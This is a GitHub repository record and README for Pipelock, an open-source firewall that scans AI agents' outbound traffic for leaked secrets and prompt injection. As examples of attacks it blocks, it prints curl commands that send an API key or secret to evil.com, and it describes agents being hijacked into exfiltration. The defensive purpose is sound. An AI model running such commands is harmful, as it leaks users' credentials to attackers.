{"id":44085289,"url":"https://github.com/luckypipewrench/pipelock","last_synced_at":"2026-04-05T01:05:30.193Z","repository":{"id":337161732,"uuid":"1152497359","full_name":"luckyPipewrench/pipelock","owner":"luckyPipewrench","description":"Security harness for AI agents — egress proxy with DLP scanning, SSRF protection, MCP response scanning, and workspace integrity monitoring","archived":false,"fork":false,"pushed_at":"2026-02-13T23:57:44.000Z","size":626,"stargazers_count":99,"open_issues_count":4,"forks_count":1,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-02-14T00:32:45.395Z","etag":null,"topics":["ai-agents","ai-security","dlp","egress-proxy","fetch-proxy","golang","integrity-monitoring","llm-security","mcp","security","ssrf-protection"],"latest_commit_sha":null,"homepage":"https://pipelab.org","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/luckyPipewrench.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":".github/CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["luckyPipewrench"],"buy_me_a_coffee":"luckyPipewrench"}},"created_at":"2026-02-08T00:40:18.000Z","updated_at":"2026-02-14T00:08:00.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/luckyPipewrench/pipelock","commit_stats":null,"previous_names":["luckypipewrench/pipelock"],"tags_count":9,"template":false,"template_full_name":null,"purl":"pkg:github/luckyPipewrench/pipelock","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luckyPipewrench%2Fpipelock","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luckyPipewrench%2Fpipelock/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luckyPipewrench%2Fpipelock/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luckyPipewrench%2Fpipelock/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/luckyPipewrench","download_url":"https://codeload.github.com/luckyPipewrench/pipelock/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luckyPipewrench%2Fpipelock/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29452586,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-14T15:52:44.973Z","status":"ssl_error","status_checked_at":"2026-02-14T15:52:11.208Z","response_time":53,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai-agents","ai-security","dlp","egress-proxy","fetch-proxy","golang","integrity-monitoring","llm-security","mcp","security","ssrf-protection"],"created_at":"2026-02-08T10:02:16.409Z","updated_at":"2026-04-05T01:05:30.181Z","avatar_url":"https://github.com/luckyPipewrench.png","language":"Go","funding_links":["https://github.com/sponsors/luckyPipewrench","https://buymeacoffee.com/luckyPipewrench"],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"assets/pipelock-logo.svg\" alt=\"Pipelock\" width=\"200\"\u003e\n\u003c/p\u003e\n\n# Pipelock\n\n[![CI](https://github.com/luckyPipewrench/pipelock/actions/workflows/ci.yaml/badge.svg)](https://github.com/luckyPipewrench/pipelock/actions/workflows/ci.yaml)\n[![Security](https://github.com/luckyPipewrench/pipelock/actions/workflows/security.yaml/badge.svg)](https://github.com/luckyPipewrench/pipelock/actions/workflows/security.yaml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/luckyPipewrench/pipelock)](https://goreportcard.com/report/github.com/luckyPipewrench/pipelock)\n[![GitHub Release](https://img.shields.io/github/v/release/luckyPipewrench/pipelock)](https://github.com/luckyPipewrench/pipelock/releases)\n[![OpenSSF Scorecard](https://api.scorecard.dev/projects/github.com/luckyPipewrench/pipelock/badge)](https://scorecard.dev/viewer/?uri=github.com/luckyPipewrench/pipelock)\n[![OpenSSF Best Practices](https://www.bestpractices.dev/projects/11948/badge?level=silver)](https://www.bestpractices.dev/projects/11948)\n[![codecov](https://codecov.io/gh/luckyPipewrench/pipelock/graph/badge.svg)](https://codecov.io/gh/luckyPipewrench/pipelock)\n[![CodeRabbit Reviews](https://img.shields.io/coderabbit/prs/github/luckyPipewrench/pipelock?labelColor=171717\u0026color=FF570A\u0026label=CodeRabbit+Reviews)](https://coderabbit.ai)\n[![License](https://img.shields.io/badge/Core-Apache_2.0-blue.svg)](LICENSE) [![License](https://img.shields.io/badge/Enterprise-ELv2-orange.svg)](enterprise/LICENSE)\n\n**Open-source [agent firewall](https://pipelab.org/agent-firewall/) and local runtime for AI agents.** Network scanning, process containment, and tool policy enforcement in a single binary.\n\nYour agent has `$ANTHROPIC_API_KEY` in its environment, plus shell access. One request is all it takes:\n\n```bash\ncurl \"https://evil.com/steal?key=$ANTHROPIC_API_KEY\"   # game over, unless pipelock is watching\n```\n\n**Works with:** Claude Code · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph · Cursor\n\n[Quick Start](#quick-start) · [Integration Guides](#integration-guides) · [Docs](docs/) · [Blog](https://pipelab.org/blog/) · [Ask Dosu](https://app.dosu.dev/bcccd1cf-be85-4c0e-ae05-edeb0ff50b59/ask)\n\n![Pipelock demo](assets/demo.gif)\n\n## Quick Start\n\n```bash\n# macOS / Linux\nbrew install luckyPipewrench/tap/pipelock\n\n# Or download a binary (no dependencies)\n# See https://github.com/luckyPipewrench/pipelock/releases\n\n# Or with Docker\ndocker pull ghcr.io/luckypipewrench/pipelock:latest\n\n# Or from source (requires Go 1.25+)\ngo install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest\n```\n\n**Try it in 30 seconds:**\n\n```bash\n# 1. Generate a config\npipelock generate config --preset balanced \u003e pipelock.yaml\n\n# 2. This should be BLOCKED (DLP catches the fake API key)\npipelock check --config pipelock.yaml --url \"https://example.com/?key=sk-ant-api03-fake1234567890\"\n\n# 3. This should be ALLOWED (clean URL, no secrets)\npipelock check --config pipelock.yaml --url \"https://docs.python.org/3/\"\n```\n\n\u003cdetails\u003e\n\u003csummary\u003eForward proxy mode (zero code changes, any HTTP client)\u003c/summary\u003e\n\nThe forward proxy intercepts standard `HTTPS_PROXY` traffic. Enable it in your config, then point any process at pipelock:\n\n```bash\n# Edit pipelock.yaml: set forward_proxy.enabled to true\npipelock run --config pipelock.yaml\n\nexport HTTPS_PROXY=http://127.0.0.1:8888\nexport HTTP_PROXY=http://127.0.0.1:8888\n\n# Now every HTTP request flows through pipelock's scanner.\ncurl \"https://example.com/?key=sk-ant-api03-fake1234567890\"  # blocked\n```\n\nNo SDK, no wrapper, no code changes. If the agent speaks HTTP, pipelock scans it.\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003eFetch proxy mode (for agents with a dedicated fetch tool)\u003c/summary\u003e\n\n```bash\n# Start the proxy (agents connect to localhost:8888/fetch?url=...)\npipelock run --config pipelock.yaml\n\n# For full network isolation (agent can ONLY reach pipelock):\npipelock generate docker-compose --agent claude-code -o docker-compose.yaml\ndocker compose up\n```\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003eVerify release integrity (SLSA provenance + SBOM)\u003c/summary\u003e\n\nEvery release includes SLSA build provenance and an SBOM (CycloneDX). Verify with the GitHub CLI:\n\n```bash\n# Verify a downloaded binary\ngh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench\n\n# Verify the container image (substitute the release version)\ngh attestation verify oci://ghcr.io/luckypipewrench/pipelock:\u003cversion\u003e --owner luckyPipewrench\n```\n\n\u003c/details\u003e\n\n## Community Rules\n\nPipelock supports signed rule bundles for distributable detection patterns. Install the official community bundle for additional DLP, injection, and tool-poison patterns beyond the built-in defaults:\n\n```bash\npipelock rules install pipelock-community\n```\n\nRules are loaded at startup and merged with built-in patterns. Bundles are Ed25519-signed and verified against the embedded keyring, which is present in release binaries (Homebrew, GitHub Releases, Docker). Source builds via `go install` must add the official public key to `trusted_keys` in their config. See [docs/rules.md](docs/rules.md) for details.\n\n## How It Works\n\nPipelock is an [agent firewall](https://pipelab.org/agent-firewall/): like a WAF for web apps, it sits inline between your AI agent and the internet. It uses **capability separation**: the agent process (which has secrets) is network-restricted, while Pipelock (which holds no agent secrets) inspects all traffic through an 11-layer scanner pipeline. Deployment (Docker network isolation, Kubernetes NetworkPolicy, etc.) enforces the separation boundary.\n\nThree proxy modes, same port:\n\n- **Fetch proxy** (`/fetch?url=...`): Pipelock fetches the URL, extracts text, scans the response for prompt injection, and returns clean content. Best for agents that use a dedicated fetch tool.\n- **Forward proxy** (`HTTPS_PROXY`): Standard HTTP CONNECT tunneling and absolute-URI forwarding. Agents use Pipelock as their system proxy with zero code changes. Hostname scanning catches blocked domains and SSRF before the tunnel opens. Request body and header DLP scanning catches secrets in POST bodies and auth headers. Optional TLS interception decrypts CONNECT tunnels for full body/header DLP and response injection scanning (requires CA setup via `pipelock tls init` and `pipelock tls install-ca`).\n- **WebSocket proxy** (`/ws?url=ws://...`): Bidirectional frame scanning with DLP + injection detection on text frames. Fragment reassembly, message size limits, idle timeout, and connection lifetime controls are all built in.\n\n```mermaid\nflowchart LR\n    subgraph PRIV[\"PRIVILEGED ZONE\"]\n        Agent[\"AI Agent\\nAPI keys + credentials + source code\\nNetwork-isolated by deployment\"]\n    end\n\n    subgraph FW[\"FIREWALL ZONE\"]\n        Proxy[\"Pipelock\\n11-layer scanner pipeline\\nNo agent secrets\"]\n    end\n\n    subgraph NET[\"INTERNET\"]\n        Web[\"APIs + MCP Servers + Web\"]\n    end\n\n    Agent -- \"fetch / CONNECT / ws / MCP\" --\u003e Proxy\n    Proxy -- \"scanned request\" --\u003e Web\n    Web -- \"response\" --\u003e Proxy\n    Proxy -- \"scanned content\" --\u003e Agent\n\n    style PRIV fill:#2d1117,stroke:#f85149,color:#e6edf3\n    style FW fill:#0d2818,stroke:#3fb950,color:#e6edf3\n    style NET fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3\n    style Agent fill:#1a1a2e,stroke:#f85149,color:#e6edf3\n    style Proxy fill:#0d2818,stroke:#3fb950,color:#e6edf3\n    style Web fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3\n```\n\n\u003cdetails\u003e\n\u003csummary\u003eText diagram (for terminals / non-mermaid renderers)\u003c/summary\u003e\n\n```\n┌──────────────────────┐         ┌───────────────────────┐\n│  PRIVILEGED ZONE     │         │  FIREWALL ZONE        │\n│                      │         │                       │\n│  AI Agent            │  IPC    │  Pipelock             │\n│  - Has API keys      │────────\u003e│  - No agent secrets   │\n│  - Has credentials   │ fetch / │  - Full internet      │\n│  - Restricted network│ CONNECT │  - Returns text       │\n│                      │ /ws     │  - WS frame scanning  │\n│                      │\u003c────────│  - URL scanning       │\n│  Can reach:          │ content │  - Audit logging      │\n│  ✓ api.anthropic.com │         │                       │\n│  ✓ discord.com       │         │  Can reach:           │\n│  ✗ evil.com          │         │  ✓ Any URL            │\n│  ✗ pastebin.com      │         │  But has:             │\n└──────────────────────┘         │  ✗ No env secrets     │\n                                 │  ✗ No credentials     │\n                                 └───────────────────────┘\n```\n\n\u003c/details\u003e\n\n## Why Pipelock?\n\n| | Pipelock | Scanners (agent-scan) | Sandboxes (srt) | Kernel agents (agentsh) |\n|---|---|---|---|---|\n| Secret exfiltration prevention | Yes | Partial (proxy mode) | Partial (domain-level) | Yes |\n| DLP + entropy analysis | Yes | No | No | Partial |\n| Prompt injection detection | Yes | Yes | No | No |\n| Workspace integrity monitoring | Yes | No | No | Partial |\n| MCP scanning (bidirectional + tool poisoning) | Yes | Yes | No | No |\n| WebSocket proxy (frame scanning + fragment reassembly) | Yes | No | No | No |\n| MCP HTTP transport (Streamable HTTP + reverse proxy) | Yes | No | No | No |\n| Emergency kill switch (config + signal + file + API) | Yes | No | No | No |\n| Event emission (webhook + syslog) | Yes | No | No | No |\n| Tool call chain detection | Yes | No | No | No |\n| Single binary, zero deps | Yes | No (Python) | No (npm) | No (kernel-level enforcement) |\n| Audit logging + Prometheus | Yes | No | No | No |\n\nFull comparison: [docs/comparison.md](docs/comparison.md)\n\n## Security Matrix\n\nPipelock runs in three modes:\n\n| Mode | Security | Web Browsing | Use Case |\n|------|----------|--------------|----------|\n| **strict** | Allowlist-only | None | Regulated industries, high-security |\n| **balanced** | Blocks naive + detects sophisticated | Via fetch or forward proxy | Most developers (default) |\n| **audit** | Logging only | Unrestricted | Evaluation before enforcement |\n\nFor agents running uncensored or abliterated models (e.g. OBLITERATUS), the [`hostile-model` preset](configs/hostile-model.yaml) layers additional defenses on top of strict mode: aggressive entropy thresholds (3.0), blanket network tool blocking, session binding, cross-request exfiltration detection, and a pre-configured kill switch. `pipelock audit` recommends this preset when it detects known guardrail-removal toolchains (currently dependency-based detection).\n\nWhat each mode prevents, detects, or logs:\n\n| Attack Vector | Strict | Balanced | Audit |\n|---------------|--------|----------|-------|\n| `curl evil.com -d $SECRET` | **Prevented** | **Prevented** | Logged |\n| Secret in URL query params | **Prevented** | **Detected** (DLP scan) | Logged |\n| Base64-encoded secret in URL | **Prevented** | **Detected** (entropy scan) | Logged |\n| DNS tunneling | **Prevented** | **Detected** (subdomain entropy) | Logged |\n| Chunked exfiltration | **Prevented** | **Detected** (rate + data budget) | Logged |\n| Public-key encrypted blob in URL | **Prevented** | Logged (entropy flags it) | Logged |\n\n\u003e **Honest assessment:** Strict mode blocks all outbound HTTP except allowlisted API domains, so there's no exfiltration channel through the proxy. Balanced mode raises the bar from \"one curl command\" to \"sophisticated pre-planned attack.\" Audit mode gives you visibility you don't have today. With the sandbox enabled (`pipelock sandbox`), pipelock adds OS-level containment (Landlock + network namespaces + seccomp) on top of content inspection — the agent can't bypass the proxy because it has no direct network access.\n\n## Features\n\n### 11-Layer URL Scanner\n\nEvery request passes through: scheme validation, CRLF injection detection, path traversal blocking, domain blocklist, DLP pattern matching (48 built-in patterns for API keys, tokens, credentials, cryptocurrency keys, environment variable secrets, and financial identifiers with checksum validation), path entropy analysis, subdomain entropy analysis, SSRF protection with DNS rebinding prevention, per-domain rate limiting, URL length limits, and per-domain data budgets.\n\nDLP runs before DNS resolution, designed to catch secrets before any DNS query leaves the proxy. BIP-39 seed phrase detection uses a dedicated scanner with dictionary lookup, sliding window matching, and SHA-256 checksum validation to catch cryptocurrency mnemonic exfiltration across all transport surfaces.\n\nSee [docs/bypass-resistance.md](docs/bypass-resistance.md) for the full evasion test matrix.\n\n### Process Sandbox\n\nUnprivileged process containment using OS-native kernel primitives. On Linux: Landlock LSM restricts filesystem access, seccomp filters dangerous syscalls, and network namespaces force all traffic through pipelock's scanner (no direct egress). On macOS: sandbox-exec profiles restrict filesystem and network. In containers, use `--best-effort` for Landlock + seccomp containment when namespace creation is restricted (network scanning uses proxy-based routing instead of kernel enforcement).\n\n```bash\npipelock sandbox --config pipelock.yaml -- python agent.py\npipelock sandbox --best-effort -- python agent.py  # containers\npipelock mcp proxy --sandbox --config pipelock.yaml -- npx server\n```\n\n### Response Scanning\n\nFetched content is scanned for prompt injection and state/control poisoning before reaching the agent. A 6-pass normalization pipeline catches zero-width character evasion, homoglyph substitution, leetspeak encoding, and base64-wrapped payloads. 25 built-in patterns cover jailbreak phrases, instruction manipulation, credential solicitation, memory persistence, preference poisoning, covert action directives, model instruction boundaries, and CJK-language instruction overrides. Actions: `block`, `strip`, `warn`, or `ask` (human-in-the-loop terminal approval).\n\n### MCP Proxy\n\nWraps any MCP server with bidirectional scanning. Three transport modes: stdio subprocess wrapping, Streamable HTTP bridging, and HTTP reverse proxy. Scans both directions: client requests checked for DLP leaks, server responses scanned for injection, and `tools/list` responses checked for poisoned descriptions and mid-session rug-pull changes.\n\n```bash\n# Wrap a local MCP server (stdio)\npipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp\n\n# Proxy a remote MCP server (HTTP)\npipelock mcp proxy --upstream http://localhost:8080/mcp\n\n# Combined mode (fetch/forward proxy + MCP on separate ports)\npipelock run --config pipelock.yaml --mcp-listen 0.0.0.0:8889 --mcp-upstream http://localhost:3000/mcp\n```\n\n### MCP Tool Policy\n\nPre-execution rules that block dangerous tool calls before they reach MCP servers. Ships with 17 built-in rules covering destructive operations, credential access, reverse shells, persistence mechanisms, and encoded command execution. Shell obfuscation detection is built-in. v2.0 adds a `redirect` action that routes dangerous operations through audited wrappers instead of blocking outright.\n\n### Tool Call Chain Detection\n\nDetects attack patterns in sequences of MCP tool calls. Ships with 10 built-in patterns covering reconnaissance, credential theft, data staging, persistence, and exfiltration chains. Uses subsequence matching with configurable gap tolerance, so inserting innocent calls between attack steps doesn't evade detection.\n\n### Kill Switch\n\nEmergency deny-all with four independent activation sources: config file, SIGUSR1, sentinel file, and remote API. Any one active blocks all traffic. The API can run on a separate port so agents can't deactivate their own kill switch.\n\n```bash\n# Activate from operator machine\ncurl -X POST http://localhost:9090/api/v1/killswitch \\\n  -H \"Authorization: Bearer TOKEN\" -d '{\"active\": true}'\n```\n\n### Scan API\n\nEvaluation endpoint for programmatic scanning. Any tool, pipeline, or control plane can submit URLs, text, or tool calls and get a structured verdict back — the proxy doesn't need to be in the request path. Four scan kinds: `url`, `dlp`, `prompt_injection`, and `tool_call`. Returns findings with scanner type, rule ID, and severity. Bearer token auth, per-token rate limiting, and Prometheus metrics.\n\nSee [docs/scan-api.md](docs/scan-api.md) for the full API reference.\n\n### Address Protection\n\nDetects blockchain address poisoning attacks where a lookalike address is substituted for a legitimate one. Validates addresses for ETH, BTC, SOL, and BNB chains, compares against a user-supplied allowlist, and flags similar addresses using prefix/suffix fingerprinting. Designed for agents that interact with DeFi protocols or execute transactions.\n\n### Filesystem Sentinel\n\nMonitors agent working directories for secrets written to disk. When an MCP subprocess writes a file containing credentials, pipelock detects it using the same DLP patterns applied to network traffic. On Linux, process lineage tracking attributes file writes to the agent's process tree. See [docs/guides/filesystem-sentinel.md](docs/guides/filesystem-sentinel.md).\n\n### Event Emission\n\nForward audit events to external systems (SIEM, webhook receivers, syslog). Events are fire-and-forget and never block the proxy. Each event includes a MITRE ATT\u0026CK technique ID where applicable (T1048 for exfiltration, T1059 for injection, T1195.002 for supply chain).\n\nSee [docs/guides/siem-integration.md](docs/guides/siem-integration.md) for log schema, forwarding patterns, and example SIEM queries.\n\n### Security Assessment\n\n`pipelock assess` runs a four-stage security assessment against your deployment: attack simulation (20 scenarios across DLP, injection, tool poisoning, and URL evasion), config audit (12 categories scored 0-100), deployment verification (live probe of scanning and containment), and MCP server discovery (protection status across Claude Code, Cursor, VS Code, and other clients).\n\nCritical exposures like unprotected MCP servers cap the grade regardless of numeric score.\n\n```bash\npipelock assess init --config pipelock.yaml\npipelock assess run assessment-a1b2c3d4/\npipelock assess finalize assessment-a1b2c3d4/\n```\n\nThe free summary shows your grade, section scores, and top findings. Licensed users get the full report with server-specific findings, remediation commands, and Ed25519-signed evidence.\n\n![Pipelock Security Summary showing grade C (79/100) with compliance coverage, MCP protection, and detection scoring](docs/assets/assess-summary.png)\n\n### More Features\n\n| Feature | What It Does |\n|---------|-------------|\n| **Audit Reports** | `pipelock report --input events.jsonl` generates HTML/JSON reports with risk rating, timeline, and evidence appendix. Ed25519 signing with `--sign`. ([Sample report](examples/sample-report.html)) |\n| **Diagnose** | `pipelock diagnose` runs 7 local checks to verify your config works end-to-end (no network required) |\n| **TLS Interception** | Optional CONNECT tunnel MITM: decrypt, scan bodies/headers/responses, re-encrypt. `pipelock tls init` generates a CA, then `pipelock tls install-ca` trusts it system-wide. |\n| **Block Hints** | Opt-in `explain_blocks: true` adds fix suggestions to blocked responses |\n| **Project Audit** | `pipelock audit ./project` scans for security risks and generates a tailored config |\n| **Config Scoring** (v2.0) | `pipelock audit score --config pipelock.yaml` evaluates security posture across 12 categories (0-100 with letter grade). Flags overpermissive tool policies. |\n| **File Integrity** | SHA256 manifests detect modified, added, or removed workspace files |\n| **Git Protection** | `git diff \\| pipelock git scan-diff` catches secrets before they're committed |\n| **Ed25519 Signing** | Key management, file signing, and signature verification for multi-agent trust |\n| **Session Profiling** | Per-session behavioral analysis (domain bursts, volume spikes) |\n| **Adaptive Enforcement** | Per-session threat score with automatic escalation from warn to block, de-escalation timers, and domain burst detection |\n| **Finding Suppression** | Silence known false positives via config rules or inline `pipelock:ignore` comments |\n| **Multi-Agent Support** | Agent identification via `X-Pipelock-Agent` header for per-agent filtering |\n| **Fleet Monitoring** | Prometheus metrics + ready-to-import [Grafana dashboard](configs/grafana-dashboard.json) |\n\n![Pipelock Agent Egress Report showing risk rating, timeline, findings by category, and evidence appendix](examples/sample-report.png)\n\n![Pipelock Fleet Monitor: Grafana dashboard showing traffic, security events, and WebSocket metrics](docs/assets/fleet-dashboard.jpg)\n\n## Configuration\n\nGenerate a starter config, or use one of the 7 presets:\n\n```bash\npipelock generate config --preset balanced \u003e pipelock.yaml\npipelock audit ./my-project -o pipelock.yaml  # tailored to your project\n```\n\n| Preset | Mode | Action | Best For |\n|--------|------|--------|----------|\n| `configs/balanced.yaml` | balanced | warn | General purpose |\n| `configs/strict.yaml` | strict | block | High-security |\n| `configs/audit.yaml` | audit | warn | Log-only monitoring |\n| `configs/claude-code.yaml` | balanced | block | Claude Code (unattended) |\n| `configs/cursor.yaml` | balanced | block | Cursor IDE |\n| `configs/generic-agent.yaml` | balanced | warn | New agents (tuning) |\n| `configs/hostile-model.yaml` | strict | block | Uncensored/abliterated models |\n\nConfig changes are picked up automatically via file watcher or SIGHUP (most fields hot-reload without restart).\n\nFull reference with all fields, defaults, and hot-reload behavior: **[docs/configuration.md](docs/configuration.md)**\n\n## Integration Guides\n\n- **[Claude Code](docs/guides/claude-code.md):** MCP proxy setup, `.claude.json` configuration\n- **[OpenAI Codex](docs/guides/codex.md):** MCP proxy wrapping, forward proxy, sandbox integration\n- **[OpenAI Agents SDK](docs/guides/openai-agents.md):** `MCPServerStdio`, multi-agent handoffs\n- **[Google ADK](docs/guides/google-adk.md):** `McpToolset`, `StdioConnectionParams`\n- **[AutoGen](docs/guides/autogen.md):** `StdioServerParams`, `mcp_server_tools()`\n- **[CrewAI](docs/guides/crewai.md):** `MCPServerStdio` wrapping, `MCPServerAdapter`\n- **[LangGraph](docs/guides/langgraph.md):** `MultiServerMCPClient`, `StateGraph`\n- **Cursor:** use `configs/cursor.yaml` with the same MCP proxy pattern as [Claude Code](docs/guides/claude-code.md)\n- **[OpenClaw](docs/guides/openclaw.md):** Gateway sidecar, init container, `generate mcporter` config wrapping\n\n## CI Integration\n\n### GitHub Action\n\nScan your project for agent security risks on every PR. No Go toolchain needed.\n\n```yaml\n# .github/workflows/pipelock.yaml\n- uses: luckyPipewrench/pipelock@v2\n  with:\n    scan-diff: 'true'\n    fail-on-findings: 'true'\n```\n\nThe action downloads a pre-built binary, runs `pipelock audit` on your project, scans the PR diff for leaked secrets, and uploads the audit report as a workflow artifact. Critical findings produce inline annotations on the PR diff.\n\nSee [`examples/ci-workflow.yaml`](examples/ci-workflow.yaml) for a complete workflow.\n\n### Reusable Workflow\n\nFor even simpler adoption, call the reusable workflow directly:\n\n```yaml\n# .github/workflows/security.yaml\njobs:\n  pipelock:\n    uses: luckyPipewrench/pipelock/.github/workflows/reusable-scan.yml@v2\n    with:\n      fail-on-critical: true\n```\n\nThat's the entire workflow. Everything else is defaults: auto-generated config, PR diff scanning, artifact upload.\n\n## Deployment\n\n```bash\n# Docker\ndocker pull ghcr.io/luckypipewrench/pipelock:latest\ndocker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \\\n  ghcr.io/luckypipewrench/pipelock:latest \\\n  run --config /config/pipelock.yaml --listen 0.0.0.0:8888\n\n# Network-isolated agent (Docker Compose)\npipelock generate docker-compose --agent claude-code -o docker-compose.yaml\ndocker compose up\n```\n\nFor production deployment recipes (Docker Compose with network isolation, Kubernetes sidecar + NetworkPolicy, iptables/nftables, macOS PF): **[docs/guides/deployment-recipes.md](docs/guides/deployment-recipes.md)**\n\n\u003cdetails\u003e\n\u003csummary\u003eAPI Reference\u003c/summary\u003e\n\n```bash\n# Fetch a URL (returns extracted text content)\ncurl \"http://localhost:8888/fetch?url=https://example.com\"\n\n# Forward proxy (when forward_proxy.enabled: true)\n# Set HTTPS_PROXY=http://localhost:8888 and use any HTTP client normally.\ncurl -x http://localhost:8888 https://example.com\n\n# WebSocket proxy (when websocket_proxy.enabled: true)\n# wscat -c \"ws://localhost:8888/ws?url=ws://upstream:9090/path\"\n\n# Health check\ncurl \"http://localhost:8888/health\"\n\n# Prometheus metrics\ncurl \"http://localhost:8888/metrics\"\n\n# JSON stats (top blocked domains, scanner hits, tunnels, block rate)\ncurl \"http://localhost:8888/stats\"\n\n# Kill switch API (when api_listen is set, use that port instead)\ncurl -X POST http://localhost:9090/api/v1/killswitch \\\n  -H \"Authorization: Bearer TOKEN\" -d '{\"active\": true}'\ncurl http://localhost:9090/api/v1/killswitch/status \\\n  -H \"Authorization: Bearer TOKEN\"\n```\n\n**Fetch response:**\n```json\n{\n  \"url\": \"https://example.com\",\n  \"agent\": \"my-bot\",\n  \"status_code\": 200,\n  \"content_type\": \"text/html\",\n  \"title\": \"Example Domain\",\n  \"content\": \"This domain is for use in illustrative examples...\",\n  \"blocked\": false\n}\n```\n\n**Health response:**\n```json\n{\n  \"status\": \"healthy\",\n  \"version\": \"x.y.z\",\n  \"mode\": \"balanced\",\n  \"uptime_seconds\": 3600.5,\n  \"dlp_patterns\": 48,\n  \"response_scan_enabled\": true,\n  \"kill_switch_active\": false\n}\n```\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003eOWASP Agentic Top 10 Coverage\u003c/summary\u003e\n\n| Threat | Coverage |\n|--------|----------|\n| ASI01 Agent Goal Hijack | **Strong:** bidirectional MCP + response scanning |\n| ASI02 Tool Misuse | **Partial:** proxy as controlled tool, MCP scanning |\n| ASI03 Identity \u0026 Privilege Abuse | **Strong:** capability separation + SSRF protection |\n| ASI04 Supply Chain Vulnerabilities | **Partial:** integrity monitoring + MCP scanning |\n| ASI05 Unexpected Code Execution | **Moderate:** HITL approval, fail-closed defaults |\n| ASI06 Memory \u0026 Context Poisoning | **Moderate:** injection detection on fetched content |\n| ASI07 Insecure Inter-Agent Communication | **Partial:** agent ID, integrity, signing |\n| ASI08 Cascading Failures | **Moderate:** fail-closed architecture, rate limiting |\n| ASI09 Human-Agent Trust Exploitation | **Partial:** HITL modes, audit logging |\n| ASI10 Rogue Agents | **Strong:** domain allowlist + rate limiting + capability separation |\n\nDetails, config examples, and gap analysis: [docs/owasp-mapping.md](docs/owasp-mapping.md)\n\n\u003c/details\u003e\n\n## Docs\n\n| Document | What's In It |\n|----------|-------------|\n| [Scan API](docs/scan-api.md) | Evaluation endpoint for programmatic URL/text/tool-call scanning |\n| [Configuration Reference](docs/configuration.md) | All config fields, defaults, hot-reload behavior, presets |\n| [Deployment Recipes](docs/guides/deployment-recipes.md) | Docker Compose, K8s sidecar + NetworkPolicy, iptables, macOS PF |\n| [Bypass Resistance](docs/bypass-resistance.md) | Known evasion techniques, mitigations, and honest limitations |\n| [Known Attacks Blocked](docs/attacks-blocked.md) | Real attacks with repro snippets and pipelock config that stops them |\n| [Policy Spec v0.1](docs/policy-spec-v0.1.md) | Portable agent firewall policy format |\n| [SIEM Integration](docs/guides/siem-integration.md) | Log schema, forwarding patterns, KQL/SPL/EQL queries |\n| [Metrics Reference](docs/metrics.md) | All 45 Prometheus metrics, alert rule templates |\n| [OWASP Agentic Top 10](docs/owasp-mapping.md) | Coverage against OWASP Agentic AI Top 10 |\n| [OWASP MCP Top 10](docs/compliance/owasp-mcp-top10.md) | Coverage against OWASP MCP Top 10 |\n| [EU AI Act Mapping](docs/compliance/eu-ai-act-mapping.md) | EU AI Act Article 9-26 compliance mapping |\n| [NIST 800-53 Mapping](docs/compliance/nist-800-53.md) | NIST SP 800-53 Rev. 5 security controls mapping |\n| [Comparison](docs/comparison.md) | How pipelock compares to agent-scan, srt, agentsh, MCP Gateway |\n| [Finding Suppression](docs/guides/suppression.md) | Rule names, path matching, inline comments, CI integration |\n| [OpenClaw Guide](docs/guides/openclaw.md) | Gateway sidecar, init container, `generate mcporter` wrapping |\n| [Security Assurance](docs/security-assurance.md) | Security model, trust boundaries, supply chain |\n| [Transport Modes](docs/guides/transport-modes.md) | Comparison of all proxy modes and their scanning capabilities |\n| [JetBrains Guide](docs/guides/jetbrains.md) | Junie MCP proxy wrapping for IntelliJ, PyCharm, GoLand, etc. |\n| [OWASP Agentic AI Threats (Top 15)](docs/owasp-agentic-top15-mapping.md) | Coverage against OWASP Agentic AI Threats \u0026 Mitigations (T1-T15) |\n| [Community Rules](docs/rules.md) | Install, configure, and create signed rule bundles |\n\n## Project 